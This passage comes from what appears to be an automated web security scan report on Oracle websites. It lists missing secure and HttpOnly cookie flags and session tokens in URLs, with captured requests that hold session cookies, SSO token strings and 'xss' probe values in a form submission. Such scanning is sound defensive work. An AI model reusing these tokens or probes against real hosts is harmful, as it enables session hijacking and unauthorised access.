HTTP/1.1 302 Moved Temporarily.oracle.com:443/OA_HTML/AppsLogin?requestUrl=https%3A%2F%2Foraclestore.oracle.com%2FOA_HTML%2FibeCAcpSSOLoginR.jsp&cancelUrl=https%3A%2F%2Foraclestore.oracle.com%2FOA_HTML%2FibeCZzpHome.jsp&langCode=USdc8301890cff82302c6164caa5fbe274fbcd6b64f26c589fd7e206f.e34Qb38Qax0Obi0La3mQaxaObNuNe0; path=/OA_HTML; secureSet-Cookie: GSI=5vUCVsOLtQWWYgjwg5RgPqhXKQ; domain=.oracle.com; path=/ Set-Cookie: GSI_pses=ZG3E0DB19D7D744455D1A0925C59A3AD3C1FF690A1596002B149367678487AD7773EFC9EF14E0C8F8F29DEECE96E7F0713; expires=Fri, 16-Dec-2011 02:34:05 GMT; path=/OA_HTML Set-Cookie: BIGipServergsiap_store_http=1510838925.5150.0000; path=/ >Redirect to https://oraclestore.oracle.com:443/OA_HTML/AppsLogin?requestUrl=https%3A%2F%2Foraclestore.oracle.com%2FOA_HTML%2FibeCAcpSSOLoginR.jsp&cancelUrl=https%3A%2F%2Foraclestore...[SNIP]...
4.36. https://oraclestore.oracle.com/OA_HTML/ibeCZzpHome.jsp
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://oraclestore.oracle.com
Path:
/OA_HTML/ibeCZzpHome.jsp
Issue detail
The following cookies were issued by the application and do not have the secure flag set:GSI=tqwrKmd4MpmUex7vEDNHntFYMv; domain=.oracle.com; path=/ GSI_pses=ZG36BBD0929B07C4DF99506769D66E5D4B8DBCA062B2F1A6DD61DE9A7BFE077AE9C90FADE45E3BCEAF4B4C29A29F35F171; expires=Fri, 16-Dec-2011 02:34:04 GMT; path=/OA_HTML BIGipServergsiap_store_http=3540882061.5150.0000; path=/
Request
GET /OA_HTML/ibeCZzpHome.jsp HTTP/1.1
Response
HTTP/1.1 302 Moved Temporarily=http://oraclestore.oracle.com/OA_HTML/ibeCZzpHome.jspSet-Cookie: GSI=tqwrKmd4MpmUex7vEDNHntFYMv; domain=.oracle.com; path=/ Set-Cookie: GSI_pses=ZG36BBD0929B07C4DF99506769D66E5D4B8DBCA062B2F1A6DD61DE9A7BFE077AE9C90FADE45E3BCEAF4B4C29A29F35F171; expires=Fri, 16-Dec-2011 02:34:04 GMT; path=/OA_HTML Set-Cookie: BIGipServergsiap_store_http=3540882061.5150.0000; path=/ >Redirect to ibeCZzdMinisites.jsp?ref=http://oraclestore.oracle.com/OA_HTML/ibeCZzpHome.jsp</TITLE></HEAD><BODY><A HREF="ibeCZzdMinisites.jsp?ref=http://oraclestore.oracle.com/OA_HTM...[SNIP]...
5. Session token in URL
previous
next
There are 5 instances of this issue:
Issue background
Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.
Issue remediation
The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.
5.1. https://campus.oracle.com/campus/HR/global_home.html
previous
next
Summary
Severity:
Medium
Confidence:
Firm
Host:
https://campus.oracle.com
Path:
/campus/HR/global_home.html
Issue detail
The response contains the following links that appear to contain session tokens:http://forums.oracle.com/forums/main.jspa;jsessionid=8d92079f30d636352b150f9b46e6a13795c2b391cd79.e3mSaNmQc3j0ax4NchmOahqSb40?categoryID=84
Request
GET /campus/HR/global_home.html HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/campus/HR/global_main.html;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; gpv_p24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; s_cc=true; gpw_e24=no%20value; s_sq=oraclegsi%3D%2526pid%253Dora%25253A%252Foracle%252Fapps%252Firc%252FcandidateSelfService%252Fwebui%252FVisAdJobSchPG%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BsubmitForm%252528%252527DefaultFormName%252527%25252C1%25252C%25257B%252527evtSrcRowIdx%252527%25253A%252527%252527%25252C%252527evtSrcRowId%252527%25253A%252527%252527%25252C%252527IrcAction%2526oidt%253D2%2526ot%253DBUTTON
Response
HTTP/1.1 200 OK-10g/10.1.3.0.0 Oracle-HTTP-Server/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... .gif" /> <a href="http://forums.oracle.com/forums/main.jspa;jsessionid=8d92079f30d636352b150f9b46e6a13795c2b391cd79.e3mSaNmQc3j0ax4NchmOahqSb40?categoryID=84" target="_blank" style="color:#000000; text-decoration:underline"> Oracle Discussion Forums</a>...[SNIP]...
5.2. https://cloud.oracle.com/mycloud/APEX_040100.wwv_flow_image_generator.get_image
previous
next
Summary
Severity:
Medium
Confidence:
Firm
Host:
https://cloud.oracle.com
Path:
/mycloud/APEX_040100.wwv_flow_image_generator.get_image
Issue detail
The URL in the request appears to contain a session token within the query string:https://cloud.oracle.com/mycloud/APEX_040100.wwv_flow_image_generator.get_image?p_position=4&p_sessionid=4454627354458997
Request
GET /mycloud/APEX_040100.wwv_flow_image_generator.get_image?p_position=4&p_sessionid=4454627354458997 HTTP/1.1/mycloud/f?p=service2:notify_me:0:::::;q=0.3DD30286BA; WWV_PUBLIC_SESSION_5003=4454627354458997; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; BIGipServerwww_cloud_oracle_com_80=2463891081.24862.0000; s_cc=true; s_nr=1318815511138; gpw_e24=no%20value; s_sq=oraclecom%2Coracleglobal%3D%2526pid%253Docom%25253Aen-us%25253A%25252Fproducts%25252Fapplications%25252Ffusion%25252F%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fcloud.oracle.com%25252Fmycloud%25252Ff%25253Fp%25253Dservice%25253Ahome%25253A0%25253A%25253A%25253A%25253A%25253A%2526ot%253DA
Response
HTTP/1.1 302 Moved Temporarily/mycloud/APEX_040100.wwv_flow_image_generator.get_image?p_position=4&p_sessionid=4454627354458997
5.3. https://cloud.oracle.com/mycloud/f
previous
next
Summary
Severity:
Medium
Confidence:
Firm
Host:
https://cloud.oracle.com
Path:
/mycloud/f
Issue detail
The response contains the following links that appear to contain session tokens:https://cloud.oracle.com/mycloud/APEX_040100.wwv_flow_image_generator.get_image?p_position=1&p_sessionid=4454627354458997 https://cloud.oracle.com/mycloud/APEX_040100.wwv_flow_image_generator.get_image?p_position=2&p_sessionid=4454627354458997 https://cloud.oracle.com/mycloud/APEX_040100.wwv_flow_image_generator.get_image?p_position=3&p_sessionid=4454627354458997 https://cloud.oracle.com/mycloud/APEX_040100.wwv_flow_image_generator.get_image?p_position=4&p_sessionid=4454627354458997
Request
GET /mycloud/f?p=service2:notify_me:0 HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/mycloud/f?p=service:home:0:::::;q=0.3%2Fcloud.oracle.com%2Fmycloud%2Ff%3Fp%3Dservice%3Ahome%3A0%3A%3A%3A%3A%3A; s_sq=oraclecloud%3D%2526pid%253Dcloud%25253Aen-us%25253A%25252FOracle%252520Public%252520Cloud%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fcloud.oracle.com%25252Fmycloud%25252Ff%25253Fp%25253Dservice2%25253Anotify_me%25253A0%2526ot%253DA%26oraclecom%2Coracleglobal%3D%2526pid%253Docom%25253Aen-us%25253A%25252Fproducts%25252Fapplications%25252Ffusion%25252F%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fcloud.oracle.com%25252Fmycloud%25252Ff%25253Fp%25253Dservice%25253Ahome%25253A0%25253A%25253A%25253A%25253A%25253A%2526ot%253DA
Response
HTTP/1.1 200 OK-11g_oracle_com_80=2463891081.24862.0000; expires=Mon, 17-Oct-2011 09:38:06 GMT; path=/...[SNIP]... <img src="APEX_040100.wwv_flow_image_generator.get_image?p_position=1&p_sessionid=4454627354458997" height="60", width="40"/> <img src="APEX_040100.wwv_flow_image_generator.get_image?p_position=2&p_sessionid=4454627354458997" height="60", width="40"/> <img src="APEX_040100.wwv_flow_image_generator.get_image?p_position=3&p_sessionid=4454627354458997" height="60", width="40"/> <img src="APEX_040100.wwv_flow_image_generator.get_image?p_position=4&p_sessionid=4454627354458997" height="60", width="40"/> ...[SNIP]...
5.4. https://cloud.oracle.com/mycloud/wwv_flow.accept
previous
next
Summary
Severity:
Medium
Confidence:
Firm
Host:
https://cloud.oracle.com
Path:
/mycloud/wwv_flow.accept
Issue detail
The response contains the following links that appear to contain session tokens:https://cloud.oracle.com/mycloud/APEX_040100.wwv_flow_image_generator.get_image?p_position=1&p_sessionid=4454627354458997 https://cloud.oracle.com/mycloud/APEX_040100.wwv_flow_image_generator.get_image?p_position=2&p_sessionid=4454627354458997 https://cloud.oracle.com/mycloud/APEX_040100.wwv_flow_image_generator.get_image?p_position=3&p_sessionid=4454627354458997 https://cloud.oracle.com/mycloud/APEX_040100.wwv_flow_image_generator.get_image?p_position=4&p_sessionid=4454627354458997
Request
POST /mycloud/wwv_flow.accept HTTP/1.1-urlencoded/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/mycloud/f?p=service2:notify_me:0:::::;q=0.3DD30286BA; WWV_PUBLIC_SESSION_5003=4454627354458997; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_cc=true; BIGipServerwww_cloud_oracle_com_80=2463891081.24862.0000; s_nr=1318815515990; gpw_e24=https%3A%2F%2Fcloud.oracle.com%2Fmycloud%2Ff%3Fp%3Dservice2%3Anotify_me%3A0%3A%3A%3A%3A%3A; s_sq=oraclecloud%3D%2526pid%253Dcloud%25253Aen-us%25253A%25252FNotify%252520Me%252520of%252520Updates%252520%25257C%252520Oracle%252520Public%252520Cloud%2526pidt%253D1%2526oid%253Djavascript%25253Aapex.submit('CREATE')%25253B%2526ot%253DA%26oraclecom%2Coracleglobal%3D%2526pid%253Docom%25253Aen-us%25253A%25252Fproducts%25252Fapplications%25252Ffusion%25252F%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fcloud.oracle.com%25252Fmycloud%25252Ff%25253Fp%25253Dservice%25253Ahome%25253A0%25253A%25253A%25253A%25253A%25253A%2526ot%253DA_step_id=1&p_instance=4454627354458997&p_page_submission_id=2015700381117342&p_request=CREATE&p_arg_names=77163203970299379&p_t01=&p_arg_names=77163411158299380&p_t02=&p_arg_names...[SNIP]...
Response
HTTP/1.1 200 OK-11g_oracle_com_80=2463891081.24862.0000; expires=Mon, 17-Oct-2011 09:38:17 GMT; path=/...[SNIP]... <img src="APEX_040100.wwv_flow_image_generator.get_image?p_position=1&p_sessionid=4454627354458997" height="60", width="40"/> <img src="APEX_040100.wwv_flow_image_generator.get_image?p_position=2&p_sessionid=4454627354458997" height="60", width="40"/> <img src="APEX_040100.wwv_flow_image_generator.get_image?p_position=3&p_sessionid=4454627354458997" height="60", width="40"/> <img src="APEX_040100.wwv_flow_image_generator.get_image?p_position=4&p_sessionid=4454627354458997" height="60", width="40"/> ...[SNIP]...
5.5. https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login
previous
next
Summary
Severity:
Medium
Confidence:
Firm
Host:
https://login.oracle.com
Path:
/pls/orasso/orasso.wwsso_app_admin.ls_login
Issue detail
The URL in the request appears to contain a session token within the query string:https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login?Site2pstoreToken=v1.2~656BF073~F67CCD99F8206924258D38DB351220E7A87F5CFA2A247E104D45F3F4AEEA543333D56FD366F29DB82FD299833B34B055A2C5E8B8B9A2C0B53FD5A340B222C52BCD9FB3F943986E3C519C3179851D7BFE59069DAB23D915BE79162A1B4BF967143AEB61184B94E138006D6FFE796DE511124E75F31EE38071343B458D610C13DE2ADFEE1D98673636EF6AD33794DBCC4C829C2520F480DE660CA3405DF5A18EE7B5918EFA7B6C07474FED018F4130EF14C5A156B204A46DD4CCCE5961688BD1BE8B3B6464B6A8558C65A283EF303875B11069F113634DCD5DF6192FFF776E76A04CFA73900D45393D18CFE0B1B8694866
Request
GET /pls/orasso/orasso.wwsso_app_admin.ls_login?Site2pstoreToken=v1.2~656BF073~F67CCD99F8206924258D38DB351220E7A87F5CFA2A247E104D45F3F4AEEA543333D56FD366F29DB82FD299833B34B055A2C5E8B8B9A2C0B53FD5A340B222C52BCD9FB3F943986E3C519C3179851D7BFE59069DAB23D915BE79162A1B4BF967143AEB61184B94E138006D6FFE796DE511124E75F31EE38071343B458D610C13DE2ADFEE1D98673636EF6AD33794DBCC4C829C2520F480DE660CA3405DF5A18EE7B5918EFA7B6C07474FED018F4130EF14C5A156B204A46DD4CCCE5961688BD1BE8B3B6464B6A8558C65A283EF303875B11069F113634DCD5DF6192FFF776E76A04CFA73900D45393D18CFE0B1B8694866 HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/index.html;q=0.3
Response
HTTP/1.1 200 OKUS1EaweP001nsI_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:38 GMT; path=/.submit()"><noscript><p>JavaScript is required. Enable JavaScript to use OAM Server.</p></noscript><form action="https://login.oracle.com/mysso/signon.jsp" method="p...[SNIP]...
6. Cookie without HttpOnly flag set
previous
next
There are 43 instances of this issue:
Issue background
If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.
Issue remediation
There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.
6.1. https://campus.oracle.com/campus/HR/emea-apply%20now.jsp
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
https://campus.oracle.com
Path:
/campus/HR/emea-apply%20now.jsp
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:JSESSIONID=8d9228d330d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; path=/campus
Request
GET /campus/HR/emea-apply%20now.jsp HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/campus/HR/global_current-openings.html;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=https%3A//campus.oracle.com/campus/HR/global_main.html; gpw_e24=https%3A//campus.oracle.com/campus/HR/global_main.html; s_sq=oraclecampus%3D%2526pid%253Dhttps%25253A//campus.oracle.com/campus/HR/global_main.html%2526oid%253Dhttps%25253A//campus.oracle.com/campus/HR/zealand_main.html%2526ot%253DA; _csoot=1318854988404
Response
HTTP/1.1 200 OK-10g/10.1.3.0.0 Oracle-HTTP-ServerSet-Cookie: JSESSIONID=8d9228d330d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; path=/campus -1252/html4/loose.dtd">...[SNIP]...
6.2. https://campus.oracle.com/campus/HR/emea1-jobs-remove1.jsp
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
https://campus.oracle.com
Path:
/campus/HR/emea1-jobs-remove1.jsp
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:JSESSIONID=8d9228d330d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; path=/campus
Request
GET /campus/HR/emea1-jobs-remove1.jsp HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/campus/HR/emea-apply%20now.jsp;q=0.30d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=https%3A//campus.oracle.com/campus/HR/global_main.html; gpw_e24=https%3A//campus.oracle.com/campus/HR/global_main.html; s_sq=oraclecampus%3D%2526pid%253Dhttps%25253A//campus.oracle.com/campus/HR/global_main.html%2526oid%253Dhttps%25253A//campus.oracle.com/campus/HR/zealand_main.html%2526ot%253DA; _csoot=1318854988404
Response
HTTP/1.1 200 OK-10g/10.1.3.0.0 Oracle-HTTP-ServerSet-Cookie: JSESSIONID=8d9228d330d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; path=/campus -1252/html4/loose.dtd">...[SNIP]...
6.3. https://campus.oracle.com/campus/HR/us-calendar.jsp
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
https://campus.oracle.com
Path:
/campus/HR/us-calendar.jsp
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:JSESSIONID=8d9228d330d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; path=/campus
Request
GET /campus/HR/us-calendar.jsp HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/campus/HR/us_main.html;q=0.30d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; _csoot=1318855007970; _csuid=X1e259aff5df73e
Response
HTTP/1.1 200 OK-10g/10.1.3.0.0 Oracle-HTTP-ServerSet-Cookie: JSESSIONID=8d9228d330d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; path=/campus -1252/html4/loose.dtd">...[SNIP]...
6.4. https://campus.oracle.com/campus/HR/us-profile-add-direct.jsp
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
https://campus.oracle.com
Path:
/campus/HR/us-profile-add-direct.jsp
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:JSESSIONID=8d9228d330d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; path=/campus
Request
GET /campus/HR/us-profile-add-direct.jsp?lname1=xss&fname1=xss&phone=xss&email=xss%40oa.com&university=xss&gdate=01%2F01%2F2012°ree=Bachelors&major=xss&curloc=xss&ploc=xss&position1=FINANCE%2F+Accounting+%2FFT+%2FBay+Area+and+Rocklin%2C+CA&position2=Any&position3=xss&Submit=SAVE HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/campus/HR/us-profile-direct.jsp?flag=0;q=0.30d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; _csoot=1318855007970; _csuid=X1e259aff5df73e
Response
HTTP/1.1 200 OK-10g/10.1.3.0.0 Oracle-HTTP-Server/campus/HR/us-profile-direct.jspSet-Cookie: JSESSIONID=8d9228d330d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; path=/campus /html4/loose.dtd">...[SNIP]...
6.5. https://campus.oracle.com/campus/HR/us-profile-direct.jsp
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
https://campus.oracle.com
Path:
/campus/HR/us-profile-direct.jsp
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:JSESSIONID=8d9228d330d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; path=/campus
Request
GET /campus/HR/us-profile-direct.jsp?flag=0 HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/campus/HR/us-profile_mobile.html;q=0.30d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; _csoot=1318855007970; _csuid=X1e259aff5df73e
Response
HTTP/1.1 200 OK-10g/10.1.3.0.0 Oracle-HTTP-ServerSet-Cookie: JSESSIONID=8d9228d330d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; path=/campus /html4/loose.dtd">...[SNIP]...
6.6. https://campus.oracle.com/campus/HR/us-upload-file.jsp
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
https://campus.oracle.com
Path:
/campus/HR/us-upload-file.jsp
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:JSESSIONID=8d9228d330d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; path=/campus
Request
GET /campus/HR/us-upload-file.jsp?flag=0 HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/campus/HR/us-profile_mobile.html;q=0.30d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; _csoot=1318855007970; _csuid=X1e259aff5df73e
Response
HTTP/1.1 200 OK-10g/10.1.3.0.0 Oracle-HTTP-ServerSet-Cookie: JSESSIONID=8d9228d330d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; path=/campus /html4/loose.dtd">...[SNIP]...
6.7. https://irecruitment.oracle.com/OA_HTML/IrcVisitor.jsp
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
https://irecruitment.oracle.com
Path:
/OA_HTML/IrcVisitor.jsp
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:JSESSIONID=7edb662ed98453aac9dc9b74d3c9b8937d8701988a5259b0428b92ef860b014a.e3ePbhaKb3qRe3yMb3aMax0Mb40; path=/OA_HTML; secure GSI=i3Mem4huzzTQAdgFWILWhbRGmk; domain=.oracle.com; path=/ BIGipServergsiap_irecruitment_http=1527616141.5150.0000; path=/
Request
GET /OA_HTML/IrcVisitor.jsp HTTP/1.1
Response
HTTP/1.1 302 Moved Temporarily.oracle.com/OA_HTML/RF.jsp?function_id=1038712&resp_id=23350&resp_appl_id=800&security_group_id=0&lang_code=US¶ms=.1VlTZi5hyKHcE3E6mrZaB91phg4LLW-2ZXXJFOuaJdg-6ALqWl2AqDOwJZdQVEM&oas=aI-seAnN7gYCF5vKSizOZg..Set-Cookie: JSESSIONID=7edb662ed98453aac9dc9b74d3c9b8937d8701988a5259b0428b92ef860b014a.e3ePbhaKb3qRe3yMb3aMax0Mb40; path=/OA_HTML; secure Set-Cookie: GSI=i3Mem4huzzTQAdgFWILWhbRGmk; domain=.oracle.com; path=/ Set-Cookie: BIGipServergsiap_irecruitment_http=1527616141.5150.0000; path=/ >Redirect to https://irecruitment.oracle.com/OA_HTML/RF.jsp?function_id=1038712&resp_id=23350&resp_appl_id=800&security_group_id=0&lang_code=US¶ms=.1VlTZi5hyKHcE3E6mrZaB91phg4LLW...[SNIP]...
6.8. https://irecruitment.oracle.com/OA_HTML/OA.jsp
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
https://irecruitment.oracle.com
Path:
/OA_HTML/OA.jsp
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:JSESSIONID=4b6c18f94d59bd512084b9e22617766b4768ed0eaa374f5913aa8ef8b3406d22.e3ePbhaKb3qRe3yMb3aMax0Mb40; path=/OA_HTML; secure
Request
